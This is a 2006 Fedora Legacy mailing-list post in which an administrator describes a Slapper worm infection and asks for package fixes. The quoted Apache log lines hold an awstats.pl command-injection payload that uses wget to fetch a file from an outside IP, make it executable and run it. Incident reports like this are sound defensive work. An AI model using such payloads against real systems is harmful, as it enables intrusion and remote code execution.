slapper worm
Michael Mansour
mic at npgx.com.au
Mon Jan 23 20:32:29 UTC 2006
Hi guys,
I have an FC1 machine which got infected twice with the slapper worm, and then
started DOS attacking a large vendor.
I've stopped slapper in its tracks with a couple of changes to FC1, but in
analysing now how it got in (it seems to use SSLv2 vulerabilities in an apache
SSL server which I've now turned off), I see the following bit of interest in
my apache access_log:
220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
HTTP/1.1"
403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
HTTP/1.1"
404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
These "scripz" files end up going into /tmp, being compiled with gcc, renamed
to "httpd" and run as that.
I'm using:
perl-5.8.3-17.4.legacy
httpd-2.0.51-1.9.legacy
openssl-0.9.7a-33.13.legacy
Are there any updates FL can do to any of the packages to fix/block slapper
from an FC1 machine?
Michael.
More information about the fedora-legacy-list
mailing list